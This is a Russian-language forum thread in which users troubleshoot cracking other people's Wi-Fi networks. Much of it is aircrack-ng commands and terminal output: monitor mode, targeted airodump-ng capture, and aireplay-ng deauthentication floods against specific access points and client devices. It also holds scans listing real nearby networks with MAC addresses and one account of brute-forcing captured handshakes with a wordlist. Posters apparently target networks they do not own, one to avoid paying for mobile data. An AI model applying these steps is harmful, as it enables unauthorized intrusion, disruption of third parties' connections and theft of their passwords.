Первый самый, он был раньше подключен, только вот инетресно почему теперь мой ноутбук не может определить, к чему он подключен, не сидит он же без инета(клиент)
То что я вижу, этим ты хешики не поймаешь.
Василий-Шишкин
12.05.2015, 12:37
↑ (https://antichat.live/posts/3846140/)
То что я вижу, этим ты хешики не поймаешь.
Это вывод команды: airodump-ng mon0.
Не я же диктую линексу что выводить, что я увидел, то я и написал сюда.
BabaDook
12.05.2015, 12:38
↑ (https://antichat.live/posts/3846145/)
Это вывод команды: airodump-ng mon0
Я по логам вижу. Я ещё раз повторю. Такой командой ВЫ хандшайк не поймайте.
Василий-Шишкин
12.05.2015, 12:39
↑ (https://antichat.live/posts/3846140/)
То что я вижу, этим ты хешики не поймаешь.
↑ (https://antichat.live/posts/3846147/)
Я по логам вижу. Я ещё раз повторю. Такой командой ВЫ хандшайк не поймайте.
А как надо? Есть какой-нибудь может другой способ.
BabaDook
12.05.2015, 12:41
↑ (https://antichat.live/posts/3846149/)
А как надо? Есть какой-нибудь может другой способ.
я в статье описал метод ловли
BabaDook
12.05.2015, 12:55
airodump-ng --bssid CC:5D:4EA:11:C8 -c1 -w hachthis mon0 эта команда верная
aireplay-ng --deauth 5 -a 20:CF:306:46B -c 9C:AD:97:4D:37:19 mon0 эта нет
Я не увидел где у тебя там клиент есть. ткни меня носов в это.
Василий-Шишкин
12.05.2015, 14:06
↑ (https://antichat.live/posts/3846156/)
airodump-ng --bssid CC:5D:4E
A:11:C8 -c1 -w hachthis mon0 эта команда верная
aireplay-ng --deauth 5 -a 20:CF:30
6:46
B -c 9C:AD:97:4D:37:19 mon0 эта нет
Я не увидел где у тебя там клиент есть. ткни меня носов в это.
В смысле? aireplay-ng программа для отключенния клиентов от сети, а airodump-ng для мониторинга (сканирования) роутеров. И они оба правельны ( на мой взгляд, потому что не я их придумал, взял с этого же форума"Античат").
BabaDook
12.05.2015, 14:11
aireplay-ng --deauth 5 -a 20:CF:306:46B -c 9C:AD:97:4D:37:19 mon0 -- какой результат работы этой команды ? Возможно когда писали мануалы был бак трак
Василий-Шишкин
12.05.2015, 14:33
↑ (https://antichat.live/posts/3846197/)
aireplay-ng --deauth 5 -a 20:CF:30
6:46
B -c 9C:AD:97:4D:37:19 mon0 -- какой результат работы этой команды ? Возможно когда писали мануалы был бак трак
Выше уже описывал:
Не могу отключить их пишет:
root@kali-Linux:~# aireplay-ng --deauth 5 -a 20:CF:30:D6:46:DB -c 9C:AD:97:4D:37:19 mon0
07:55:13 Waiting for beacon frame (BSSID: 20:CF:30:D6:46:DB) on channel -1
07:55:13 Couldn't determine current channel for mon0, you should either force the operation with --ignore-negative-one or apply a kernel patch
Please specify an ESSID (-e).
если добовляю essid, то:
root@kali-Linux:~# aireplay-ng --deauth 5 -e JackVorobey -a 20:CF:30:D6:46:DB -c 9C:AD:97:4D:37:19 mon0
08:02:06 Waiting for beacon frame (BSSID: 20:CF:30:D6:46:DB) on channel -1
08:02:06 Couldn't determine current channel for mon0, you should either force the operation with --ignore-negative-one or apply a kernel patch
↑ (https://antichat.live/posts/3846209/)
Выше уже описывал:
Советую Вам wifislax для начала, там намного проще и больше (шансов поймать хендшейк ) утилит. По моему для вардрайвинга софта проще нет и переведен на русский . /threads/423233/ (https://antichat.live/threads/423233/)
Destroy525
13.05.2015, 23:59
↑ (https://antichat.live/posts/3846151/)
я в статье описал метод ловли
Попробую передать мой опыт, так скажем первые шаги...
Я делал по такой инструкции:
1. airmon-ng start wlan0
2. airodump-ng mon0
3. airodump-ng -w (name of target) -c (channel) --bssid (target mac address) mon0
4. aireplay-ng wlan0 --deauth 5 -a (mac bssid) -c (mac client) mon0
после этой команды клиент должен отвалится и заново аутонтифицироваться.
после последней команды мониторим ситуацию с хендшейком. я с первой попытки выудил 2 хендшейка подряд. позже наудивление сбрутил пассы один за 10 мин, второй за 2.5 часа работы со штатным словарем с инета, скорость перебора составила в районе 11000 паролей в сек. Все работает, нужно понимачть что делаешь. А не просто копировать.
честно говоря не помню откуда взял словарик но он меня порадовал.
быстрее всего твоя проблемма в мощьности сигнал, смотри чтобы сигнал точки был не выше -65 дб - это раз
второе, я там видел на одном окне у тебя надпись fixed channel -1, э использует "свою" уязивимость ВПС
третье, ривер это ревир а все остальное это отдельно, ривер работает с конкретной уязивимостью ВПС и может перебором ламать пин роутера если этот конкретный роутер имеет эту уязвимость и не лимитирует попытки подключений что уже редкость
четвертое, ты не видиш мак адреса бссид но зато видиш клиетов, а также видиш ш ессид (тоисть имя) базовой станции, вобше бывает на оборот, видно базу а не видно клиента и непонятно что подать аиреплаю на отправку чтоб разорвать соединение и запросить его повторнно с высылкой хендшейко который и нужно пофмать
пятое, крякать нужно уже пойманый хеншейк который записался в кап файл.
если не поможет напишу статью с подробным разяснением )
Russian_MafiA
15.01.2016, 01:07
Мля , чувак . Ты не указываешь на конкретную тд. Синтаксис для перехвата хендшейка прост , но важно чтобы кто-то из пользователей был подключен , иначе чей хэндшейк перехватывать ?
Итак синтаксис
airmon-ng wlan0- переводит ваш адаптер в режим мониторинга.
airodump-ng mon0 -сканируете в надежде найти тд.
airodump-ng -w(имя файла хэндш.) --bssid(мак тд) - c(канал тд) mon0 - конкретизируем точку доступа и начинаем собирать пакеты!!!
П.С . а вообще , учите английский и учитесь пользоваться гуглом и яндексом , там этого добра навалом . На первых ссылках наипонятнейшим языком все разъясняют.(тд - точка доступа)
EgorKoval
29.07.2018, 19:25
С помощью airodump-ng отловил сетку с WEP , но к сожалению название скрыто, кто-то может посоветовать, как можно "поработать" с этой сетью?
Сейчас сижу на мобильном интернете, а здесь это капец как не дёшево.
Заранее спасибо за советы!
P.S. И подскажите, почему у неё PWR стоит в -1 ?
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
A0:21:B73E9 -1 0 0 0 -1 -1
00:8E:F2:AB:EF:0C -1 0 55 0 10 -1 WPA
58:23:8C:03:88:4C -39 712 0 0 1 54e WPA2 CCMP PSK THOM_ONO4321
DC:53:7C:30:3B1 -42 1310 0 0 6 54e WPA2 CCMP PSK ONO8DED
90:67:1C:19:30:3C -49 967 63 0 4 54e WPA2 CCMP PSK vodafone3034
E0:41:36:BD:C2:8A -52 1176 275 0 10 54e WPA2 CCMP PSK MOVISTAR_C289
10:620:19:6C:EB -57 1235 19 0 11 54e WPA2 CCMP PSK Lowi6CE6
D8:FB:5E:9D:86:27 -62 879 7 0 1 54e WPA2 CCMP PSK MOVISTAR_8626
D8:B6:B7:2E:85:2E -61 1108 0 0 11 54e WPA2 CCMP PSK JAZZTEL_852E
80:29:94:B1C:92 -53 1156 170 0 11 54e WPA2 CCMP PSK ONO6461
90:67:1C:19:7F:F4 -84 71 7 0 1 54e WPA2 CCMP PSK vodafone7FEE
00:26:4D:49:68:6C -1 0 1 0 2 -1 WEP WEP
70:5A:9E:27:5C:BD -85 26 0 0 1 54e WPA2 CCMP PSK vodafone5CB8
3A:F7:3D:08:68:6E -90 49 0 0 1 54e WPA2 CCMP PSK
Нечего не понял если честно из вопроса.
EgorKoval
30.07.2018, 17:25
Я правильно понял: название сетки скрыто,поэтому PWR -1?
EgorKoval
30.07.2018, 17:37
Когда я спрашивал, можно ли ,как-то поработать с сеткой WEP, я имел ввиду,можно ли при таком уровне мощности, как -85 пытаться деаутентифицировать точку или это дохлый номер? Клиентов у неё я в явном виде не наблюдаю, поэтому и спрашиваю, можно ли как-то "ломануть" эту ТД?
P.S. AWUS036AC
90:67:1C:19:7F:F4 -84 71 7 0 1 54e WPA2 CCMP PSK vodafone7FEE
00:26:4D:49:68:6C -1 0 1 0 2 -1 WEP WEP
70:5A:9E:27:5C:BD -85 26 0 0 1 54e WPA2 CCMP PSK vodafone5CB8
↑ (https://antichat.live/posts/4232017/)
Я правильно понял: название сетки скрыто,поэтому PWR -1?
PWR -1 Это мёртвый сигнал.Настолько мёртвый,что даже beacon пакеты не долетают до антенны. Чаще всего,именно поэтому точка "скрыта".
↑ (https://antichat.live/posts/4232023/)
Когда я спрашивал, можно ли ,как-то поработать с сеткой WEP, я имел ввиду,можно ли при таком уровне мощности, как -85 пытаться деаутентифицировать точку или это дохлый номер?
При атаке на точку с WEP, деаутентификация не требуется.Там принцип атаки другой.Основная задача,заключается в сборе необходимого объёма данных (пакетов), и расшифровки ключа.
↑ (https://antichat.live/posts/4232023/)
Клиентов у неё я в явном виде не наблюдаю, поэтому и спрашиваю, можно ли как-то "ломануть" эту ТД?
С таким сигналом,вряд ли получится.А если и получится,юзать точно не выйдет.
Считается,что клиент не нужен.Но в моих случаях,именно наличие клиента,позволяло получить ключ.Причём для более быстрого сбора данных,нужен активный траффик между точкой и клиентом.
Есть команда,которая должна заставлять точку,активно генерировать пакеты.Вот этот трюк и не работал.
EgorKoval
31.07.2018, 02:27
↑ (https://antichat.live/posts/4232061/)
С таким сигналом,вряд ли получится.А если и получится,юзать точно не выйдет.
Считается что клиент не нужен.Но в моих случаях,именно наличие клиента,позволяло получить ключ.Причём для более быстрого сбора данных,нужен активный траффик между точкой и клиентом.
Есть команда,которая должна заставлять точку,активно генерировать пакеты.Вот тут-то у меня этот трюк не работал.
Спасибо за пояснения,стало ясно что с WEP номер дохлый,будем пытаться ловить хэндшейки с WPA.
EgorKoval
31.07.2018, 14:30
Парни посмотрите пожалуйста wpacrack.zip или есть там рукопожатие, сам я профан пока в этом((
EgorKoval
31.07.2018, 15:13
Вот ещё взял только что,вроде всё делал правильно,гляньте валидно ли содержимое
Заранее всем грасиас!
EgorKoval
31.07.2018, 21:43
↑ (https://antichat.live/posts/4232395/)
Да.
Спасибо и если не трудно, могли бы Вы пояснить, как дальше действовать, там что то чистить или конвертить?
К сожалению плаваю пока в этой теме.
↑ (https://antichat.live/posts/4232554/)
Спасибо и если не трудно, могли бы Вы пояснить, как дальше действовать, там что то чистить или конвертить?
К сожалению плаваю пока в этой теме.
https://antichat.com/threads/435763/
В самом низу поста.
EgorKoval
01.08.2018, 00:47
↑ (https://antichat.live/posts/4232558/)
https://antichat.com/threads/435763/
В самом низу поста.
Спасибо. Буду пробовать привести в "порядок" согласно инструкции!
EgorKoval
01.08.2018, 02:59
Вродебы привёл в порядок, взгляните пожалуйста на скрин,или годный сар-файл для дальнейшей работы с ним?
EgorKoval
01.08.2018, 12:45
↑ (https://antichat.live/posts/4232642/)
Пойдёт.
Спасибо!
EgorKoval
03.08.2018, 01:29
fixed chanel wlan1: -1 , иногда в окне терминала выскакивает это оповещение, не смотря на то что ты задал совсем иной канал?
Помогает только перезагрузка.
Что это за фокус?
команда была следующая:
airodump-ng wlan1 --bssid E0:41:36:BD:C2:8A --channel 10 --write handshake
EgorKoval
05.08.2018, 15:42
Кто с таким сталкивался в своей практике,поделитесь инфой:
Всё делаю,как обычно,убиваю всё лишнее,перевожу железку в режим монитора,нахожу искомую ТД,далее:
airodump-ng wlan1 --bssid 8C:04:FF:BE:02:AE --channel 1 --write handshake --wps --ignore-negative-one,
затем направленное deauth сообщение:
sudo aireplay-ng --deauth 13 -a 8C:04:FF:BE:02:AE -c BC:03:08:AF:51:2A wlan1 --ignore-negative-one,
клиент отваливается,подключается, нет рукопожатия.
Пробуем Отправить широковещательное deauth сообщение:
sudo aireplay-ng wlan1 --deauth 13 -a 8C:04:FF:BE:02:AE --ignore-negative-one,
мощность на ТД падает до нуля,нет рукопожатия,ок.
Заё-ем клиента до нервного срыва:
sudo aireplay-ng --deauth 100 -a 8C:04:FF:BE:02:AE -c BC:03:08:AF:51:2A wlan1 --ignore-negative-one,
клиент пропадает из мониторинга (перегружает телефон),и так было дважды.
Вобщем довели друг друга до нервного срыва,а результат тотже,нет рукопожатия.
Как так может быть?
aka_google
05.08.2018, 16:03
скрин дай airodump-ng -c 13 --bssid 8C:04:FF:BE:02:AE wlan1
EgorKoval
05.08.2018, 16:16
↑ (https://antichat.live/posts/4234220/)
скрин дай airodump-ng -c 13 --bssid 8C:04:FF:BE:02:AE wlan
Ок, не догадался сразу сделать скрин
EgorKoval
05.08.2018, 21:33
↑ (https://antichat.live/posts/4234220/)
скрин дай airodump-ng -c 13 --bssid 8C:04:FF:BE:02:AE wlan1
К сожалению клиенты искомой точки пока так и не проявились,поэтому скринов пока нет(
EgorKoval
07.08.2018, 15:29
↑ (https://antichat.live/posts/4234220/)
скрин дай airodump-ng -c 13 --bssid 8C:04:FF:BE:02:AE wlan1
здесь и широкая и узкая деаутен-я
EgorKoval
07.08.2018, 15:30
Спасибо!
aka_google
07.08.2018, 15:45
airodump-ng -c 13 --bssid 8C:04:FF:BE:02:AE wlan1
вот чего скрин нужен а не деаунтификации силу посмотреть сигнала к АП
EgorKoval
08.08.2018, 13:55
↑ (https://antichat.live/posts/4234689/)
airodump-ng -c 13 --bssid 8C:04:FF:BE:02:AE wlan1
вот чего скрин нужен а не деаунтификации силу посмотреть сигнала к АП
Миерда, извини. по задрочке не то выложил,исправлюсь)
Скрины выкладывал в сидя в соседнем парке с ноутом (снова без вайфай), а рядом "мусорки" местные тормознули,так я стал побырому закругляться и видимо втулил нето шо надо!
EgorKoval
08.08.2018, 14:35
↑ (https://antichat.live/posts/4234689/)
airodump-ng -c 13 --bssid 8C:04:FF:BE:02:AE wlan1
вот чего скрин нужен а не деаунтификации силу посмотреть сигнала к АП
↑ (https://antichat.live/posts/4234281/)
К сожалению клиенты искомой точки пока так и не проявились,поэтому скринов пока нет(
/threads/464369/ (https://antichat.live/threads/464369/)
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot